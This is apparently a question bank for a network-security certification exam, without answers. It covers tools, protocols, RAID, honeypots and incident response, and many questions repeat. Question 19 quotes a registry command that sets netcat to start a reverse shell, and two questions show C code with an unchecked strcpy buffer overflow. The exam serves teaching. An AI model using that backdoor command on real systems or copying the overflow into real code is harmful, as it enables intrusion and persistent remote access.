EMT Practice Test

1. Question Content...


Question List

Question1: Which of the following tool is used for passive attacks to capture network traffic?

Question2: Which of the following features is used to generate spam on the Internet by spammers and worms?

Question3: Physical access controls help organizations monitor, record, and control access to the information assets and facility. Identify the category of physical security controls which includes security labels and warning signs.

Question4: Which of the following is an intrusion detection system that reads all incoming packets and tries to find suspicious patterns known as signatures or rules?

Question5: Harry has sued the company claiming they made his personal information public on a social networking site in the United States. The company denies the allegations and consulted a/an
______for legal advice to defend them against this allegation.

Question6: Which of the following honeypots is a useful little burglar alarm?

Question7: Which of the following policies is a set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly?

Question8: Which of the following network scanning tools is a TCP/UDP port scanner that works as a ping sweeper and
hostname resolver?

Question9: Phishing-like attempts that present users a fake usage bill of the cloud provider is an example of a:

Question10: Harry has successfully completed the vulnerability scanning process and found serious vulnerabilities exist in the organization's network. Identify the vulnerability management phases through which he will proceed to ensure all the detected vulnerabilities are addressed and eradicated. (Select all that apply)

Question11: Fill in the blank with the appropriate term.
A ______________ is a translation device or service that is often controlled by a separate Media Gateway Controller, which provides the call control and signaling functionality.

Question12: CORRECT TEXT
Fill in the blank with the appropriate term.
______________ is an enumeration technique used to glean information about computer systems on a network and the services running its open ports.

Question13: Which of the following steps will NOT make a server fault tolerant? Each correct answer represents a complete solution. Choose two.

Question14: Which of the following tools is described below? It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.

Question15: Harry has sued the company claiming they made his personal information public on a social networking site in the United States. The company denies the allegations and consulted a/an _______ for legal advice to defend them against this allegation.

Question16: Chris is a senior network administrator. Chris wants to measure the Key Risk Indicator (KRI) to assess the organization. Why is Chris calculating the KRI for his organization? It helps Chris to:

Question17: Nancy is working as a network administrator for a small company. Management wants to implement a RAID storage for their organization. They want to use the appropriate RAID level for their backup plan that will satisfy the following requirements:
1. It has a parity check to store all the information about the data in multiple drives
2. Help reconstruct the data during downtime.
3. Process the data at a good speed.
4. Should not be expensive.
The management team asks Nancy to research and suggest the appropriate RAID level that best suits their requirements. What RAID level will she suggest?

Question18: Which of the following are the valid steps for securing routers? Each correct answer represents a complete solution. Choose all that apply.

Question19: You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d
192.168.1.7 4444 -e
cmd.exe"
What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.

Question20: Which of the following tools is a free laptop tracker that helps in tracking a user's laptop in case it gets stolen?

Question21: Which of the following standards is an amendment to the original IEEE 802.11 and specifies security mechanisms for wireless networks?

Question22: You are taking over the security of an existing network. You discover a machine that is not being used as such, but has software on it that emulates the activity of a sensitive database server.
What is this?

Question23: Which OSI layer does a Network Interface Card (NIC) work on?

Question24: Sophie has been working as a Windows network administrator at an MNC over the past 7 years.
She wants to check whether SMB1 is enabled or disabled. Which of the following command allows Sophie to do so?

Question25: Henry needs to design a backup strategy for the organization with no service level downtime. Which backup method will he select?

Question26: Which of the following tools is a free portable tracker that helps the user to trace the laptop if it is stolen?

Question27: Which of the following attacks, the attacker cannot use the software, which is trying a number of key combinations in order to obtain your password?

Question28: Which of the following processes helps the business units to understand the impact of a disruptive event?

Question29: David is working in a mid-sized IT company. Management asks him to suggest a framework that can be used effectively to align the IT goals to the business goals of the company. David suggests the______framework, as it provides a set of controls over IT and consolidates them to form a framework.

Question30: If a network is at risk resulting from misconfiguration performed by unskilled and/or unqualified individuals, what type of threat is this?

Question31: Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?

Question32: Jason works as a System Administrator for www.company.com Inc. The company has a Windows-based network. Sam, an employee of the company, accidentally changes some of the applications and system settings. He complains to Jason that his system is not working properly. To troubleshoot the problem, Jason diagnoses the internals of his computer and observes that some changes have been made in Sam's computer registry. To rectify the issue, Jason has to restore the registry. Which of the following utilities can Jason use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.

Question33: Which of the following procedures is designed to enable security personnel to identify, mitigate, and recover
from malicious computer incidents, such as unauthorized access to a system or data, denial-of-service, or
unauthorized changes to system hardware, software, or data?

Question34: CORRECT TEXT
Fill in the blank with the appropriate term. A ______________is a block of data that a Web server stores on the client computer.

Question35: Which type of firewall consists of three interfaces and allows further subdivision of the systems based on specific security objectives of the organization?

Question36: Which of the following is one of the most commonly used implementations of RAID?

Question37: Which of the following systems includes an independent NAS Head and multiple storage arrays?

Question38: Which of the following help in estimating and totaling up the equivalent money value of the benefits and costs
to the community of projects for establishing whether they are worthwhile?
Each correct answer represents a complete solution. Choose all that apply.

Question39: Which of the following UTP cables is NOT suitable for data transmission or Ethernet data work usage?

Question40: John works as a C programmer. He develops the following C program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int buffer(char *str)
{
char buffer1[10];
strcpy(buffer1, str);
return 1;
}
int main(int argc, char *argv[]) {
buffer (argv[1]);
printf("Executed\n");
return 1;
}
His program is vulnerable to a __________ attack.

Question41: Daniel is monitoring network traffic with the help of a network monitoring tool to detect any abnormalities.
What type of network security approach is Daniel adopting?

Question42: Which of the following types of VPN uses the Internet as its main backbone, allowing users, customers, and branch offices to access corporate network resources across various network architectures?

Question43: Which of the following layers of TCP/IP model is used to move packets between the Internet Layer interfaces of two different hosts on the same link?

Question44: A network designer needs to submit a proposal for a company, which has just published a web portal for its clients on the internet. Such a server needs to be isolated from the internal network, placing itself in a DMZ. Faced with this need, the designer will present a proposal for a firewall with three interfaces, one for the internet network, another for the DMZ server farm and another for the internal network. What kind of topology will the designer propose?

Question45: Which of the following is used in conjunction with smoke detectors and fire alarm systems to improve and increase public safety?

Question46: Identify the Password Attack Technique in which the adversary attacks cryptographic hash functions based on the probability, that if a hashing process is used for creating a key, then the same is used for other keys?

Question47: FILL BLANK
Fill in the blank with the appropriate term. The ____________ is used for routing voice conversations over the
Internet. It is also known by other names such as IP Telephony, Broadband Telephony, etc.

Question48: Which of the following honeypots provides an attacker access to the real operating system without any restriction and collects a vast amount of information about the attacker?

Question49: Which of the following is the main international standards organization for the World Wide Web?

Question50: Each of the following is a network layer protocol used for a particular (MAC) address to obtain an IP address?

Question51: Which of the following is a distributed multi-access network that helps in supporting integrated communications using a dual bus and distributed queuing?

Question52: Which of the following networks interconnects devices centered on an individual person's workspace?

Question53: Fill in the blank with the appropriate term. The ___________protocol is a feature of packet-based data transmission protocols. It is used to keep a record of the frame sequences sent and their respective acknowledgements received by both the users.

Question54: John works as a C programmer. He develops the following C program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int buffer(char *str) {
char buffer1[10];
strcpy(buffer1, str);
return 1;
}
int main(int argc, char *argv[]) {
buffer (argv[1]);
printf("Executed\n");
return 1;
}
His program is vulnerable to a __________ attack.

Question55: During the recovery process, RTO and RPO should be the main parameters of your disaster recovery plan. What does RPO refer to?

Question56: You are monitoring your network traffic with the Wireshark utility and noticed that your network is experiencing a large amount of traffic from a certain region. You suspect a DoS incident on the network. What will be your first reaction as a first responder?

Question57: John works as a C programmer. He develops the following C program:

His program is vulnerable to a __________ attack.

Question58: What is the bit size of the Next Header field in the IPv6 header format?

Question59: Network security is the specialist area, which consists of the provisions and policies adopted by the Network Administrator to prevent and monitor unauthorized access, misuse, modification, or denial of the computer network and network-accessible resources. For which of the following reasons is network security needed? Each correct answer represents a complete solution. Choose all that apply.

Question60: Which of the following attack surface increase when you keep USB ports enabled on your laptop unnecessarily?

Question61: Frank is a network technician working for a medium-sized law firm in Memphis. Frank and two other IT employees take care of all the technical needs for the firm. The firm's partners have asked that a secure wireless network be implemented in the office so employees can move about freely without being tied to a network cable. While Frank and his colleagues are familiar with wired Ethernet technologies, 802.3, they are not familiar with how to setup wireless in a business environment. What IEEE standard should Frank and the other IT employees follow to become familiar with wireless?

Question62: Management wants to bring their organization into compliance with the ISO standard for information security risk management. Which ISO standard will management decide to implement?

Question63: Which of the following is a worldwide organization whose mission is to create, refine and promote internet safety standards?

Question64: Which of the following helps in blocking all unauthorized inbound and/or outbound traffic?

Question65: Elden is working as a network administrator at an IT company. His organization opted for a virtualization technique in which the guest OS is aware of the virtual environment in which it is running and communicates with the host machines for requesting resources. Identify the virtualization technique implemented by Elden's organization.

Question66: Which of the following is a service discovery protocol that allows computers and other devices to find services in a local area network without prior configuration?

Question67: Which of the following steps are required in an idle scan of a closed port?
Each correct answer represents a part of the solution. Choose all that apply.

Question68: You work as the network administrator for uCertify Inc. The company has planned to add the support for IPv6 addressing. The initial phase deployment of IPv6 requires support from some IPv6-only devices. These devices need to access servers that support only IPv4. Which of the following tools would be suitable to use?

Question69: Which of the following types of coaxial cable is used for cable TV and cable modems?

Question70: Which of the following is an attack on a website that changes the visual appearance of the site and seriously damages the trust and reputation of the website?

Question71: Which of the following is a network analysis tool that sends packets with nontraditional IP stack parameters?

Question72: Which of the following policies is used to add additional information about the overall security posture and serves to protect employees and organizations from inefficiency or ambiguity?

Question73: Which of the following is a management process that provides a framework for promoting quick recovery and the capability for an effective response to protect the interests of its brand, reputation, and stakeholders?

Question74: Which of the following represents a network that connects two or more LANs in the same geographical area?

Question75: Which of the following tools is an open source protocol analyzer that can capture traffic in real time?

Question76: Which of the following protocols is used in wireless networks?

Question77: Which of the following is a process that detects a problem, determines its cause, minimizes the damages, resolves the problem, and documents each step of response for future reference?

Question78: Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?

Question79: Which of the following layers of the TCP/IP model maintains data integrity by ensuring that messages are delivered in the order in which they are sent and that there is no loss or duplication?

Question80: Which of the following types of coaxial cable is used for cable TV and cable modems?

Question81: Which of the following is a software tool used in passive attacks for capturing network traffic?

Question82: Which of the following is the full form of SAINT?

Question83: How is application whitelisting different from application blacklisting?

Question84: Which of the following protocols is a method of implementing virtual private networks?

Question85: Jason works as a System Administrator for www.company.com Inc. The company has a Windows-based network. Sam, an employee of the company, accidentally changes some of the applications and system settings. He complains to Jason that his system is not working properly. To troubleshoot the problem, Jason diagnoses the internals of his computer and observes that some changes have been made in Sam's computer registry. To rectify the issue, Jason has to restore the registry. Which of the following utilities can Jason use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.

Question86: Identify the network topology where each computer acts as a repeater and the data passes from one computer to the other in a single direction until it reaches the destination.

Question87: DRAG DROP
Drag and drop the Response management plans to match up with their respective purposes.
Select and Place:

Question88: Which of the following tools is used to ping a given range of IP addresses and resolve the host name of the
remote system?

Question89: Which of the following topologies is a type of physical network design where each computer in the network is connected to a central device through an unshielded twisted-pair (UTP) wire?

Question90: You are a professional Computer Hacking forensic investigator. You have been called to collect evidences of buffer overflow and cookie snooping attacks. Which of the following logs will you review to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.

Question91: Fill in the blank with the appropriate term. A _______________device is used for uniquely recognizing humans based upon one or more intrinsic physical or behavioral traits.

Question92: Fill in the blank with the appropriate term. The_______________ is typically considered as the top InfoSec officer in the organization and helps in maintaining current and appropriate body of knowledge required to perform InfoSec management functions.

Question93: In which of the following attacks does an attacker successfully insert an intermediary software or program between two communicating hosts?

Question94: Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another?

Question95: Which of the following are provided by digital signatures?

Question96: Which of the following tools examines a system for a number of known weaknesses and alerts the
administrator?

Question97: Which among the following tools can help in identifying IoEs to evaluate human attack surface?

Question98: Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?

Question99: Which of the following is a device that receives a digital signal on an electromagnetic or optical transmission medium and regenerates the signal along the next leg of the medium?

Question100: Which of the following are the distance-vector routing protocols? Each correct answer represents a complete solution. Choose all that apply.

Question101: Which of the following is an exterior gateway protocol that communicates using a Transmission Control Protocol (TCP) and sends the updated router table information?

Question102: Which of the following protocols is used for exchanging routing information between two gateways in a network of autonomous systems?

Question103: Which of the following is the best way of protecting important data against virus attack?

Question104: Which of the following layers refers to the higher-level protocols used by most applications for network communication?

Question105: Which of the following is a non-profit organization that oversees the allocation of IP addresses, management of
the DNS infrastructure, protocol parameter assignment, and root server system management?

Question106: Damian is the chief security officer of Enigma Electronics. To block intruders and prevent any environmental accidents, he needs to set a two-factor authenticated keypad lock at the entrance, rig a fire suppression system, and link any video cameras at various corridors to view the feeds in the surveillance room. What layer of network defense-in-depth strategy is he trying to follow?

Question107: Which of the following IEEE standards defines a physical bus topology?

Question108: In ______ method, event logs are arranged in the form of a circular buffer.

Question109: Paul is a network security technician working on a contract for a laptop manufacturing company in Chicago.
He has focused primarily on securing network devices, firewalls, and traffic traversing in and out of the network. He just finished setting up a server a gateway between the internal private network and the outside public network. This server will act as a proxy, limited amount of services, and will filter packets. What is this type of server called?

Question110: Which of the following is a distributed application architecture that partitions tasks or work loads between service providers and service requesters?Each correct answer represents a complete solution. Choose all that apply.

Question111: Which of the following protocols is a more secure version of the Point-to-Point Tunneling Protocol (PPTP) and provides tunneling, address assignment, and authentication?

Question112: Which has the following fields IPv6 header is reduced by 1 for each router that sends a packet?

Question113: Which of the following protocols is used for inter-domain multicast routing?

Question114: John works as an Ethical Hacker for www.company.com Inc. He wants to find out the ports that are open in www.company.com's server using a port scanner. However, he does not want to establish a full TCP connection. Which of the following scanning techniques will he use to accomplish this task?

Question115: Which of the following is a type of computer security that deals with protection against spurious signals emitted by electrical equipment in the system?

Question116: Which of the following types of information can be obtained through network sniffing? (Choose all that apply.)

Question117: Which of the following is a 16-bit field that identifies the source port number of the application program in the host that is sending the segment?

Question118: FILL BLANK
Fill in the blank with the appropriate term. ______________is a protocol used to synchronize the timekeeping
among the number of distributed time servers and clients.

Question119: Which of the following is a type of computer security that deals with protection against spurious signals emitted by electrical equipment in the system?

Question120: Which of the following types of VPN uses the Internet as its main backbone, allowing users, customers, and branch offices to access corporate network resources across various network architectures?

Question121: Which of the following statements are true about volatile memory?Each correct answer represents a complete solution. Choose all that apply.

Question122: Which of the following steps will NOT make a server fault tolerant? Each correct answer represents a complete
solution. (Choose two.)

Question123: Which of the following is a management process that provides a framework to stimulate a rapid recovery, and the ability to react effectively to protect the interests of its brand, reputation and stakeholders?

Question124: Which of the following techniques uses a modem in order to automatically scan a list of telephone numbers?

Question125: Which of the following classes of IP addresses provides a maximum of only 254 host addresses per network ID?

Question126: Fred is a network technician working for Johnson Services, a temporary employment agency in Boston. Johnson Services has three remote offices in New England and the headquarters in Boston where Fred works.
The company relies on a number of customized applications to perform daily tasks and unfortunately these applications require users to be local administrators. Because of this, Fred's supervisor wants to implement tighter security measures in other areas to compensate for the inherent risks in making those users local admins. Fred's boss wants a solution that will be placed on all computers throughout the company and monitored by Fred. This solution will gather information on all network traffic to and from the local computers without actually affecting the traffic. What type of solution does Fred's boss want to implement?

Question127: Network security is the specialist area, which consists of the provisions and policies adopted by the Network Administrator to prevent and monitor unauthorized access, misuse, modification, or denial of the computer network and network-accessible resources. For which of the following reasons is network security needed? Each correct answer represents a complete solution.
Choose all that apply.